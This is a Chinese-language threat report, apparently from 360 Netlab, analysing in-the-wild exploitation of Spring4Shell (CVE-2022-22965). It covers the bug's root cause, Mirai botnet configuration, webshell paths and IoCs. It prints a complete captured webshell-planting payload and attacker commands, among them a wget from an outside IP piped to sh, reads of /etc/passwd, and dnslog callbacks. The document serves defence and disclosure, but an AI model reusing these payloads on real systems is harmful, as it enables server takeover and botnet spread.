Spring4Shell在野漏洞传播分析
背景介绍
2022年3月31号,Spring针对Spring4Shell漏洞(CVE-2022-22965)事件发布了安全公告[1],并提供了漏洞修复程序,此次漏洞事件在安全社区引起广泛关注。
360网络安全研究院高级威胁狩猎蜜罐系统[2]通过被动监测方式看到了该漏洞在野传播过程,我们也看到了Mirai僵尸网络入场,相关在野漏洞攻击威胁情报已通过自动化形式输出。
Spring4Shell 在野传播
360网络安全研究院高级威胁狩猎蜜罐系统持续监测到Spring4Shell漏洞(CVE-2022-22965)扫描和漏洞利用行为,部分源IP地理位置分布如下:
以下是Top 10 国家/地区统计列表
United States 92
The Netherlands 49
Germany 30
China 21
France 6
Luxembourg 6
Sweden 6
Switzerland 5
Ukraine 5
Austria 4
我们监测到大量Webshell和测试文件的上传行为,相应文件信息如下所示:
部分在野漏洞利用命令信息如下所示:
echo%20ddfdsfasdfasd
echo%20fdsafasdfasd
echo%202222222
ls
ls%20/tmp/
whoami
%2Fbin%2Fsh%2F-c%24%7BIFS%7D%27cd%24%7BIFS%7D%2Ftmp%3Bwget%24%7BIFS%7Dhttp%3A%2F%2F107.174.133.167%2Ft.sh%24%7BIFS%7D-O-%A6sh%24%7BIFS%7DSpringCore%3B%27
cat+/etc/passwd
chdir
cmd /c dir
cmd /c net user
curl+http://111.4vcrkb.dnslog.cn/1.jpg
curl+http://12121.4vcrkb.dnslog.cn/1.jpg
curl+http://35456.4vcrkb.dnslog.cn/1.jpg
dir
echo
echo 8888888888
echo %USERNAME%
echo %computername%
echo </xss>
echo fucker_test_test
echo rinima
echo%20%3Csvg%20onload=confirm`xss`%3E
echo%20%3Csvg%20onload=confirm`xsssssss`%3E
echo%20ddfdsfasdfasd
echo%20fdsafasdfasd
echo%202222222
echo+22222
echo+`whoami`
echo+whoami
exp
id
ifconfig
ls
ls%20/tmp/
ping -n 2 uup0fk.dnslog.cn
ping uup0fk.dnslog.cn
uname
whoami
whoami%0A
Spring4Shell 漏洞分析
Spring4Shell漏洞(CVE-2022-22965)是在JDK 9版本及以上新增module特性后导致的,并且是针对CVE-2010-1622漏洞补丁的绕过。
CVE-2010-1622 漏洞分析
CVE-2010-1622漏洞是Spring Bean的CachedIntrospectionResults类在调用java.beans.Introspector.getBeanInfo()枚举属性赋值时,没有指定stop类,导致父类(Object.class是任何java对象的父类)属性可被攻击者恶意控制。
Spring参数绑定支持用户提交表单以 参数=值 的形式进行对象赋值,同时user.address.street=Disclosure+Str等价于frmObj.getUser().getAddress().setStreet("Disclosure Str.")。因此可通过user.address.street=Disclosure+Str的方式给PropertyDescriptor[]中的第一个class属性赋值。如通过classLoader控制class属性,进而构造利用链。
漏洞补丁
Spring通过将classLoader加入属性数组黑名单的方式修补漏洞。
CVE-2022-22965 漏洞分析
在参数绑定过程中,包含class属性,与CVE-2010-1622漏洞问题类似:
CVE-2022-22965是CVE-2010-1622补丁的绕过,在JDK11+Tomcat8.5.77+spring-webmvc5.3.17版本中,调试发现通过class.module.classLoader.*可以加载ParallelWebappClassLoader绕过黑名单对classLoader的检测:
在野Payload:
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=222
pattern指定日志记录的格式,suffix指定日志记录的后缀为.jsp,directory指定日志保存的目录webapps/ROOT,prefix指定文件名tomcatwar,fileDateFormat指定日志文件名日期格式,上述payload通过Tomcat的class AbstractAccessLogValve修改了日志的存储格式、目录和文件名,实现了Webshell的上传。
漏洞补丁
新增了严格的黑名单限制
Mirai僵尸网络
我们看到Mirai僵尸网络很快入场,相关配置信息解密如下所示:
[0x01]: "46.175.146.159\x00", size=15
[0x02]: "A\x84", size=2
[0x03]: "D\xfd", size=2
[0x04]: "U better back the fuck off CIANigger >>>---<3-->\x00", size=49
[0x05]: "shell\x00", size=6
[0x06]: "enable\x00", size=7
[0x07]: "system\x00", size=7
[0x08]: "sh\x00", size=3
[0x09]: "/bin/busybox DEMONS\x00", size=20
[0x0a]: "DEMONS: applet not found\x00", size=25
[0x0b]: "ncorrect\x00", size=9
[0x0c]: "/bin/busybox ps\x00", size=16
[0x0d]: "assword\x00", size=8
[0x0e]: "ogin\x00", size=5
[0x0f]: "enter\x00", size=6
[0x10]: "/proc/\x00", size=7
[0x11]: "/exe\x00", size=5
[0x12]: "/fd\x00", size=4
[0x13]: "/maps\x00", size=6
[0x14]: "/proc/net/tcp\x00", size=14
[0x15]: "/etc/resolv.conf\x00", size=17
[0x16]: "nameserver\x00", size=11
[0x17]: "Pully\x13SHD\x1aiIGK\x1cDig\x13\x18}Bfpc]MkGp^b\x12[}P\x1b\\~m`b`^rc\x13Xeg\x13G\x1a\x12z*", size=57
[0x18]: "i586\x00", size=5
[0x19]: "i486\x00", size=5
[0x1a]: "x86\x00", size=4
[0x1b]: "i686\x00", size=5
[0x1c]: "mips\x00", size=5
[0x1d]: "mipsel\x00", size=7
[0x1e]: "mpsl\x00", size=5
[0x1f]: "sh4\x00", size=4
[0x20]: "superh\x00", size=7
[0x21]: "ppc\x00", size=4
[0x22]: "powerpc\x00", size=8
[0x23]: "spc\x00", size=4
[0x24]: "sparc\x00", size=6
[0x25]: "(deleted)\x00", size=10
[0x26]: "abcdefghijklmnopqrstuvwxyz\x00", size=27
[0x27]: "%d.%d.%d.%d\x00", size=12
[0x28]: "POST /cdn-cgi/\x00", size=15
[0x29]: "UPX!\x00", size=5
[0x2a]: "botnet\x00", size=7
[0x2b]: "ddos\x00", size=5
[0x2c]: "oginenterassword\x00", size=17
[0x2d]: "GET/ HTTP/1.1\x00", size=15
[0x2e]: "garm\x00", size=5
[0x2f]: "gx86\x00", size=5
[0x30]: "gmips\x00", size=6
[0x31]: "gmpsl\x00", size=6
[0x32]: "gsh4\x00", size=5
[0x33]: "gspc\x00", size=5
[0x34]: "gppc\x00", size=5
[0x35]: "gsec\x00", size=5
[0x36]: ".glm\x00", size=5
[0x37]: "cronx86\x00", size=8
[0x38]: "cronarm\x00", size=8
[0x39]: "cronmips\x00", size=9
[0x3a]: "cronmpsl\x00", size=9
[0x3b]: "cronsh4\x00", size=8
[0x3c]: "cronspc\x00", size=8
[0x3d]: "cronppc\x00", size=8
[0x3e]: "cronsh\x00", size=7
[0x3f]: "gi686\x00", size=6
[0x40]: "/dev/watchdog\x00", size=14
[0x41]: "/dev/misc/watchdog\x00", size=19
[0x42]: "/dev/FTWDT101_watchdog\x00", size=23
[0x43]: "/dev/FTWDT101 watchdog\x00\x12", size=24
[0x44]: "/dev/watchdog0\x00", size=15
[0x45]: "/etc/default/watchdog\x00", size=22
[0x46]: "/sbin/watchdog\x00", size=15
Webshell和测试文件列表
| filepath | count |
|---|---|
| /tmp/log222.txt | 3973 |
| webapps/ROOT/log111.txt | 2051 |
| webapps/ROOT/tomcatwar.jsp | 110 |
| webapps/ROOT/wpz.jsp | 27 |
| /../webapps/ROOT/logout.jsp | 12 |
| ./webapps/ROOT/test2%20%20.txt | 9 |
| webapps/ROOT/log101.txt | 7 |
| /log_data_9.jsp | 3 |
| webapps/ROOT/xiaozhan.jsp | 3 |
| webapps/ROOT/1122.jsp | 3 |
| webapps/ROOT/0985763860781234.jsp | 3 |
| /2023.jsp | 3 |
| webapps/ROOT/zhuzhuxias.jsp | 3 |
| webapps/ROOT/log147.txt | 2 |
| webapps/ROOT/aaa69875.jsp | 1 |
| webapps/ROOT/log186.txt | 1 |
| webapps/ROOT/aaa36917.jsp | 1 |
| webapps/ROOT/member3war.jsp | 1 |
| webapps/ROOT/aaa96225.jsp | 1 |
| webapps/ROOT/log154.txt | 1 |
| webapps/ROOT/log103.txt | 1 |
| webapps/ROOT/log176.txt | 1 |
| webapps/ROOT/7FMNZ.jsp | 1 |
| webapps/ROOT/aaa28643.jsp | 1 |
| webapps/ROOT/aaa49231.jsp | 1 |
| webapps/ROOT/aaa50586.jsp | 1 |
| webapps/ROOT/log112.txt | 1 |
| webapps/ROOT/log110.txt | 1 |
| webapps/ROOT/aaa80751.jsp | 1 |
| /2021.jsp | 1 |
| webapps/ROOT/aaa10854.jsp | 1 |
| webapps/ROOT/log105.txt | 1 |
| webapps/ROOT/aaa93089.jsp | 1 |
| webapps/ROOT/35456.jsp | 1 |
| webapps/ROOT/log182.txt | 1 |
| webapps/ROOT/aaa24348.jsp | 1 |
| webapps/ROOT/log131.txt | 1 |
| webapps/ROOT/indexbk.jsp | 1 |
| webapps/ROOT/log149.txt | 1 |
| webapps/ROOT/log179.txt | 1 |
| webapps/webappsbak/sxxd1648765386.txt | 1 |
| webapps/ROOT/log150.txt | 1 |
| Webapps/ROOT/78754.jsp | 1 |
| webapps/ROOT/aaa24168.jsp | 1 |
| webapps/ROOT/aaa10487.jsp | 1 |
| webapps/ROOT/log178.txt | 1 |
| webapps/ROOT/lapsus | 1 |
| webapps/ROOT/zhuzhuxia.jsp | 1 |
| webapps/ROOT/log135.txt | 1 |
| webapps/ROOT/aaa40373.jsp | 1 |
| webapps/ROOT/qweasd.jsp | 1 |
| webapps/ROOT/console.jsp | 1 |
| webapps/ROOT/aaa79694.jsp | 1 |
| webapps/ROOT/aaa54378.jsp | 1 |
| webapps/ROOT/log129.txt | 1 |
| webapps/ROOT/pCJrI.jsp | 1 |
| webapps/ROOT/log162.txt | 1 |
| Webapps/ROOT/7875456457.jsp | 1 |
| webapps/ROOT/.jsp | 1 |
| webapps/ROOT/log200.txt | 1 |
| webapps/ROOT/8888888888.jsp | 1 |
| webapps/ROOT/8888888888.txt | 1 |
| webapps/ROOT/log128.txt | 1 |
| webapps/ROOT/log124.txt | 1 |
| webapps/ROOT/aaa14058.jsp | 1 |
| webapps/ROOT/aaa94175.jsp | 1 |
| webapps/ROOT/conf.jsp | 1 |
| webapps/stupidRumor_war/tomcatwar.jsp | 1 |
| webapps/ROOT/aaa83816.jsp | 1 |
处置建议
我们建议Spring用户及时升级漏洞程序,并排查相应Webshell文件路径。
联系我们
感兴趣的读者,可以在 twitter 或者通过邮件netlab[at]360.cn联系我们。
IoC List
Mirai C2
46.175.146.159:16772
IP
1.85.220.54 China AS4134 CHINANET-BACKBONE
3.239.1.141 United States AS14618 AMAZON-AES
5.2.69.50 The Netherlands AS60404 Liteserver
14.0.170.249 China AS38819 HKCSL-AS-AP
23.128.248.10 United States AS398355 DATAIDEAS-LLC
23.128.248.11 United States AS398355 DATAIDEAS-LLC
23.128.248.12 United States AS398355 DATAIDEAS-LLC
23.128.248.13 United States AS398355 DATAIDEAS-LLC
23.128.248.14 United States AS398355 DATAIDEAS-LLC
23.128.248.15 United States AS398355 DATAIDEAS-LLC
23.128.248.16 United States AS398355 DATAIDEAS-LLC
23.128.248.17 United States AS398355 DATAIDEAS-LLC
23.128.248.19 United States AS398355 DATAIDEAS-LLC
23.128.248.20 United States AS398355 DATAIDEAS-LLC
23.128.248.21 United States AS398355 DATAIDEAS-LLC
23.128.248.22 United States AS398355 DATAIDEAS-LLC
23.128.248.23 United States AS398355 DATAIDEAS-LLC
23.128.248.24 United States AS398355 DATAIDEAS-LLC
23.128.248.25 United States AS398355 DATAIDEAS-LLC
23.128.248.27 United States AS398355 DATAIDEAS-LLC
23.128.248.28 United States AS398355 DATAIDEAS-LLC
23.128.248.29 United States AS398355 DATAIDEAS-LLC
23.128.248.33 United States AS398355 DATAIDEAS-LLC
23.128.248.34 United States AS398355 DATAIDEAS-LLC
23.128.248.38 United States AS398355 DATAIDEAS-LLC
23.128.248.39 United States AS398355 DATAIDEAS-LLC
23.128.248.40 United States AS398355 DATAIDEAS-LLC
23.128.248.41 United States AS398355 DATAIDEAS-LLC
23.128.248.42 United States AS398355 DATAIDEAS-LLC
23.128.248.43 United States AS398355 DATAIDEAS-LLC
23.128.248.44 United States AS398355 DATAIDEAS-LLC
23.128.248.46 United States AS398355 DATAIDEAS-LLC
23.128.248.48 United States AS398355 DATAIDEAS-LLC
23.128.248.50 United States AS398355 DATAIDEAS-LLC
23.128.248.51 United States AS398355 DATAIDEAS-LLC
23.128.248.53 United States AS398355 DATAIDEAS-LLC
23.128.248.54 United States AS398355 DATAIDEAS-LLC
23.128.248.55 United States AS398355 DATAIDEAS-LLC
23.128.248.56 United States AS398355 DATAIDEAS-LLC
23.128.248.57 United States AS398355 DATAIDEAS-LLC
23.128.248.58 United States AS398355 DATAIDEAS-LLC
23.128.248.59 United States AS398355 DATAIDEAS-LLC
23.128.248.60 United States AS398355 DATAIDEAS-LLC
23.128.248.61 United States AS398355 DATAIDEAS-LLC
23.128.248.62 United States AS398355 DATAIDEAS-LLC
23.128.248.63 United States AS398355 DATAIDEAS-LLC
23.128.248.64 United States AS398355 DATAIDEAS-LLC
23.128.248.65 United States AS398355 DATAIDEAS-LLC
23.129.64.130 United States AS396507 EMERALD-ONION
23.129.64.131 United States AS396507 EMERALD-ONION
23.129.64.132 United States AS396507 EMERALD-ONION
23.129.64.133 United States AS396507 EMERALD-ONION
23.129.64.134 United States AS396507 EMERALD-ONION
23.129.64.135 United States AS396507 EMERALD-ONION
23.129.64.136 United States AS396507 EMERALD-ONION
23.129.64.137 United States AS396507 EMERALD-ONION
23.129.64.138 United States AS396507 EMERALD-ONION
23.129.64.139 United States AS396507 EMERALD-ONION
23.129.64.140 United States AS396507 EMERALD-ONION
23.129.64.141 United States AS396507 EMERALD-ONION
23.129.64.142 United States AS396507 EMERALD-ONION
23.129.64.143 United States AS396507 EMERALD-ONION
23.129.64.145 United States AS396507 EMERALD-ONION
23.129.64.146 United States AS396507 EMERALD-ONION
23.129.64.147 United States AS396507 EMERALD-ONION
23.129.64.148 United States AS396507 EMERALD-ONION
23.129.64.149 United States AS396507 EMERALD-ONION
23.129.64.210 United States AS396507 EMERALD-ONION
23.129.64.211 United States AS396507 EMERALD-ONION
23.129.64.212 United States AS396507 EMERALD-ONION
23.129.64.213 United States AS396507 EMERALD-ONION
23.129.64.214 United States AS396507 EMERALD-ONION
23.129.64.215 United States AS396507 EMERALD-ONION
23.129.64.216 United States AS396507 EMERALD-ONION
23.129.64.217 United States AS396507 EMERALD-ONION
23.129.64.218 United States AS396507 EMERALD-ONION
23.129.64.219 United States AS396507 EMERALD-ONION
23.129.64.250 United States AS396507 EMERALD-ONION
23.154.177.6 United States AS399532 ULAYER-ASN
23.154.177.7 United States AS399532 ULAYER-ASN
23.239.21.195 United States AS63949 LINODE-AP
27.102.106.117 South Korea AS45996 GNJ-AS-KR
37.187.18.212 France AS16276 OVH
37.187.96.183 France AS16276 OVH
43.128.201.239 Thailand AS132203 TENCENT-NET-AP-CN
43.242.116.54 India AS45916 GTPL-AS-AP
45.15.16.105 Sweden AS42675 OBEHOSTING
45.32.251.86 Japan AS20473 AS-CHOOPA
45.33.101.246 United States AS63949 LINODE-AP
45.61.186.160 United States AS53667 PONYNET
45.78.48.51 Japan AS25820 IT7NET
45.128.133.242 Belgium AS206804 EstNOC-GLOBAL
45.129.56.200 Denmark AS39351 ESAB-AS
45.136.15.239 China AS139659 LUCID-AS-AP
45.153.160.2 The Netherlands AS212906 moneroj-ca
45.153.160.132 The Netherlands AS212906 moneroj-ca
45.153.160.136 The Netherlands AS212906 moneroj-ca
45.154.255.138 Sweden AS41281 KEFF
45.154.255.139 Sweden AS41281 KEFF
45.154.255.147 Sweden AS41281 KEFF
46.166.139.111 The Netherlands AS43350 NFORCE
46.175.146.159 The Netherlands AS50673 Serverius-as
46.232.251.191 Germany AS197540 netcup-AS
51.15.76.60 The Netherlands AS12876 AS12876
51.77.52.216 Poland AS16276 OVH
58.82.211.226 China AS137872 PEOPLESPHONE-HK
58.240.81.135 China AS4837 CHINA169-Backbone
60.248.106.229 China AS3462 HINET
62.102.148.68 Sweden AS51815 TEKNIKBYRAN
62.102.148.69 Sweden AS51815 TEKNIKBYRAN
64.113.32.29 United States AS15154 SBBSNET
66.220.242.222 United States AS17356 VERMONT-TELE
74.82.47.194 United States AS6939 HURRICANE
81.17.18.59 Switzerland AS51852 PLI-AS
81.17.18.62 Switzerland AS51852 PLI-AS
85.93.218.204 Luxembourg AS9008 ASN-VO
85.204.116.204 Romania AS48874 HOSTMAZE
87.120.37.231 Bulgaria AS34224 NETERRA-AS
89.58.27.84 Germany AS197540 netcup GmbH
89.163.131.159 Germany AS24961 MYLOC-AS
89.163.131.160 Germany AS24961 MYLOC-AS
91.132.147.168 Germany AS197540 netcup-AS
91.149.225.172 Norway AS58110 IPVOLUME
91.211.89.43 Ukraine AS206638 hostfory
91.211.89.107 Ukraine AS206638 hostfory
91.211.89.207 Ukraine AS206638 hostfory
91.250.242.12 Romania AS6718 NAV
92.246.84.133 Germany AS44592 SkyLink
93.95.226.212 Iceland AS44925 THE-1984-AS
93.174.89.132 The Netherlands AS202425 INT-NETWORK
93.179.115.27 United States AS25820 IT7NET
94.140.114.210 Latvia AS43513 NANO-AS
101.37.159.147 China AS37963 CNNIC-ALIBABA-CN-NET-AP
103.27.108.196 China AS132883 TOPWAY-AS-AP
103.42.196.135 India AS138754 KVBPL-AS-IN
103.42.196.203 India AS138754 KVBPL-AS-IN
103.108.193.24 China AS139021 WEST263GO-HK
103.140.186.68 Singapore AS206804 EstNOC-GLOBAL
103.140.186.72 Singapore AS206804 EstNOC-GLOBAL
103.140.186.73 Singapore AS206804 EstNOC-GLOBAL
103.214.146.5 China AS135330 ADCDATACOM-AS-AP
103.253.41.98 China AS133398 TELE-AS
104.244.72.115 Luxembourg AS53667 PONYNET
104.244.76.13 Luxembourg AS53667 PONYNET
104.244.76.44 Luxembourg AS53667 PONYNET
104.244.76.170 Luxembourg AS53667 PONYNET
104.244.77.101 Luxembourg AS53667 PONYNET
107.189.5.249 Luxembourg AS53667 PONYNET
109.70.100.19 Austria AS208323 APPLIEDPRIVACY-AS
109.70.100.31 Austria AS208323 APPLIEDPRIVACY-AS
109.70.100.82 Austria AS208323 APPLIEDPRIVACY-AS
109.70.100.84 Austria AS208323 APPLIEDPRIVACY-AS
109.201.133.100 The Netherlands AS43350 NFORCE
111.252.183.41 China AS3462 HINET
111.252.198.28 China AS3462 HINET
112.5.154.7 China AS9808 CMNET-GD
112.36.205.252 China AS24444 CMNET-V4shandong-AS-AP
112.169.175.24 South Korea AS131477 SHHJ-AS
119.86.148.176 China AS4134 CHINANET-BACKBONE
124.222.23.106 China AS45090 CNNIC-TENCENT-NET-AP
128.31.0.13 United States AS3 MIT-GATEWAYS
141.164.43.95 South Korea AS20473 AS-CHOOPA
142.4.206.84 Canada AS16276 OVH
143.198.131.158 United States AS14061 DIGITALOCEAN-ASN
144.172.73.66 United States AS212513 STELZL-AS
144.202.116.138 United States AS20473 AS-CHOOPA
144.217.86.109 Canada AS16276 OVH
146.19.174.33 China AS147293 NEAROUTE-AS-AP
146.59.233.33 France AS16276 OVH
151.80.148.159 France AS16276 OVH
159.223.73.101 Singapore AS14061 DIGITALOCEAN-ASN
162.247.74.7 United States AS4224 CALYX-AS
164.92.65.110 United States AS14061 DIGITALOCEAN-ASN
164.132.9.199 France AS16276 OVH
166.70.207.2 United States AS6315 XMISSION
167.71.238.228 India AS14061 DIGITALOCEAN-ASN
167.99.76.46 Singapore AS14061 DIGITALOCEAN-ASN
168.62.22.238 United States AS8075 MICROSOFT-CORP-MSN-AS-BLOCK
171.25.193.20 Germany AS198093 DFRI-AS
171.25.193.25 Germany AS198093 DFRI-AS
171.25.193.77 Germany AS198093 DFRI-AS
171.25.193.78 Germany AS198093 DFRI-AS
172.104.93.152 Japan AS63949 LINODE-AP
172.104.140.107 Germany AS63949 LINODE-AP
172.104.159.48 Germany AS63949 LINODE-AP
172.107.241.110 United States AS40676 AS40676
172.245.89.109 United States AS36352 AS-COLOCROSSING
175.178.154.77 China AS45090 CNNIC-TENCENT-NET-AP
178.17.170.135 Moldova AS43289 TRABIA
178.17.171.102 Moldova AS43289 TRABIA
178.17.174.14 Moldova AS43289 TRABIA
178.20.55.18 France AS29075 IELO
182.255.45.211 China AS6134 XNNET
185.34.33.2 France AS28855 OCTOPUCE-AS
185.36.81.95 Lithuania AS133398 TELE-AS
185.38.175.130 Denmark AS205235 LABITAT
185.38.175.131 Denmark AS205235 LABITAT
185.56.80.65 The Netherlands AS43350 NFORCE
185.82.126.13 Latvia AS52173 MAKONIX
185.83.214.69 Portugal AS58110 IPVOLUME
185.100.86.74 Finland AS200651 FlokiNET
185.100.86.128 Finland AS200651 FlokiNET
185.100.87.41 Romania AS200651 FlokiNET
185.100.87.133 Romania AS200651 FlokiNET
185.100.87.174 Romania AS200651 FlokiNET
185.100.87.202 Romania AS200651 FlokiNET
185.105.90.134 Russia AS205090 FIRST-SERVER-EUROPE
185.107.47.171 The Netherlands AS43350 NFORCE
185.107.47.215 The Netherlands AS43350 NFORCE
185.107.70.56 The Netherlands AS43350 NFORCE
185.112.147.12 Iceland AS44925 THE-1984-AS
185.129.62.62 Denmark AS57860 ZENCURITY-NET
185.163.119.0 Germany AS197540 netcup-AS
185.165.171.40 Romania AS200651 FlokiNET
185.165.171.84 Romania AS200651 FlokiNET
185.170.114.25 Germany AS197540 netcup-AS
185.174.101.214 United States AS8100 ASN-QUADRANET-GLOBAL
185.220.100.240 Germany AS205100 F3NETZE
185.220.100.241 Germany AS205100 F3NETZE
185.220.100.242 Germany AS205100 F3NETZE
185.220.100.243 Germany AS205100 F3NETZE
185.220.100.244 Germany AS205100 F3NETZE
185.220.100.245 Germany AS205100 F3NETZE
185.220.100.246 Germany AS205100 F3NETZE
185.220.100.247 Germany AS205100 F3NETZE
185.220.100.248 Germany AS205100 F3NETZE
185.220.100.249 Germany AS205100 F3NETZE
185.220.100.250 Germany AS205100 F3NETZE
185.220.100.251 Germany AS205100 F3NETZE
185.220.100.252 Germany AS205100 F3NETZE
185.220.100.253 Germany AS205100 F3NETZE
185.220.100.254 Germany AS205100 F3NETZE
185.220.100.255 Germany AS205100 F3NETZE
185.220.101.6 The Netherlands AS208294 RELAYON
185.220.101.22 The Netherlands AS208294 RELAYON
185.220.101.32 The Netherlands AS208294 RELAYON
185.220.101.33 The Netherlands AS208294 RELAYON
185.220.101.34 The Netherlands AS208294 RELAYON
185.220.101.35 The Netherlands AS208294 RELAYON
185.220.101.36 The Netherlands AS208294 RELAYON
185.220.101.37 The Netherlands AS208294 RELAYON
185.220.101.38 The Netherlands AS208294 RELAYON
185.220.101.39 The Netherlands AS208294 RELAYON
185.220.101.40 The Netherlands AS208294 RELAYON
185.220.101.41 The Netherlands AS208294 RELAYON
185.220.101.42 The Netherlands AS208294 RELAYON
185.220.101.43 The Netherlands AS208294 RELAYON
185.220.101.44 The Netherlands AS208294 RELAYON
185.220.101.45 The Netherlands AS208294 RELAYON
185.220.101.46 The Netherlands AS208294 RELAYON
185.220.101.47 The Netherlands AS208294 RELAYON
185.220.101.48 The Netherlands AS208294 RELAYON
185.220.101.49 The Netherlands AS208294 RELAYON
185.220.101.50 The Netherlands AS208294 RELAYON
185.220.101.51 The Netherlands AS208294 RELAYON
185.220.101.52 The Netherlands AS208294 RELAYON
185.220.101.53 The Netherlands AS208294 RELAYON
185.220.101.54 The Netherlands AS208294 RELAYON
185.220.101.55 The Netherlands AS208294 RELAYON
185.220.101.56 The Netherlands AS208294 RELAYON
185.220.101.57 The Netherlands AS208294 RELAYON
185.220.101.58 The Netherlands AS208294 RELAYON
185.220.101.59 The Netherlands AS208294 RELAYON
185.220.101.60 The Netherlands AS208294 RELAYON
185.220.101.61 The Netherlands AS208294 RELAYON
185.220.101.62 The Netherlands AS208294 RELAYON
185.220.101.63 The Netherlands AS208294 RELAYON
185.220.102.240 The Netherlands AS60729 ZWIEBELFREUNDE
185.220.102.245 The Netherlands AS60729 ZWIEBELFREUNDE
185.220.102.249 The Netherlands AS60729 ZWIEBELFREUNDE
185.220.102.254 The Netherlands AS60729 ZWIEBELFREUNDE
185.220.103.7 United States AS4224 CALYX-AS
185.226.67.169 Greece AS205053 Aweb-ASN
185.243.218.27 Norway AS56655 TERRAHOST
185.246.188.95 Belgium AS3164 ASTIMP-IT
185.247.226.98 Iceland AS200651 FlokiNET
185.254.75.32 Germany AS3214 XTOM
188.68.58.0 Germany AS197540 netcup-AS
192.42.116.23 The Netherlands AS1101 IP-EEND-AS
193.31.24.154 Germany AS197540 netcup-AS
193.110.95.34 Switzerland AS13030 INIT7
193.111.199.64 Germany AS24961 MYLOC-AS
193.218.118.95 Ukraine AS207656 EPINATURA
193.218.118.183 Ukraine AS207656 EPINATURA
193.218.118.231 Ukraine AS207656 EPINATURA
194.31.98.186 The Netherlands AS213035 AS-SERVERION
194.233.77.245 Singapore AS141995 CAPL-AS-AP
195.176.3.19 Switzerland AS559 SWITCH
195.176.3.23 Switzerland AS559 SWITCH
198.54.128.102 United States AS11878 TZULO
198.98.51.189 United States AS53667 PONYNET
198.98.57.207 United States AS53667 PONYNET
198.144.121.43 The Netherlands AS206264 AMARUTU-TECHNOLOGY
199.195.248.29 United States AS53667 PONYNET
199.195.254.81 United States AS53667 PONYNET
199.249.230.87 United States AS62744 QUINTEX
203.175.13.118 China AS141677 NATHOSTS-AS-AP
204.8.156.142 United States AS10961 BGP-AS
205.185.117.149 United States AS53667 PONYNET
205.185.124.178 United States AS53667 PONYNET
209.141.41.103 United States AS53667 PONYNET
209.141.44.64 United States AS53667 PONYNET
209.141.45.189 United States AS53667 PONYNET
209.141.46.81 United States AS53667 PONYNET
209.141.46.203 United States AS53667 PONYNET
209.141.54.195 United States AS53667 PONYNET
209.141.55.26 United States AS53667 PONYNET
209.141.57.178 United States AS53667 PONYNET
209.141.58.146 United States AS53667 PONYNET
209.141.60.19 United States AS53667 PONYNET
210.217.18.88 South Korea AS4766 KIXS-AS-KR
211.20.42.23 China AS3462 HINET
212.107.30.157 China AS41378 KirinoNET
213.61.215.54 Germany AS8220 COLT
213.164.204.146 Sweden AS8473 BAHNHOF
217.138.199.93 Czech Republic AS9009 M247
URL
http://107.174.133.167/gmpsl
http://107.174.133.167/gi686
http://107.174.133.167/garm
http://107.174.133.167/gmips
http://107.174.133.167/garm7
http://107.174.133.167/gx86
http://107.174.133.167/t.sh
http://107.174.133.167/garm6
http://107.174.133.167/garm5
http://15.185.213.122:65123/javac
http://15.185.213.122:65123
base64://be3f78b59fa14140b6cc8633bf705a75
http://15.185.213.122:65123/java
base64://c08fec5682085417b0a039bdf47c38f2
MD5
4bcd19351697d04fb357ce5b36600207
7d244e7bf48d6631b588cecae87e759d
9c14d670a48bba4b7c047a01d417f8f2
97a7a357b8290a7236a5fbf45f17569f
7621f1a5e8db18f3ae30031122c9c397
100674f1e3ecfb6fa244de4ba7fd2ae2
329155ab45e244661a7725d81dfad740
611630a580e33017be32de8c72625489
650152a2fe78dfceceb4d1a1fdeaccb8
400590515f0f1cf942fe734126be94e7
a8a36132632366c7f65066b23d6f7e4f
b1124c862998bc4ab3ff8b1d471310a6
cca63413e3ca6b834b6a4446768c5ccb
dcc157b2c284ac676000d64dd33f3ec4
e1190f07a6da91caaa317affc9512caa
eba95249cf0a51e300d7b6029cf7088e
fb63e9a23dbf4124116471fcf3254283
fd839753ca4d89c0ccd229b12f95827c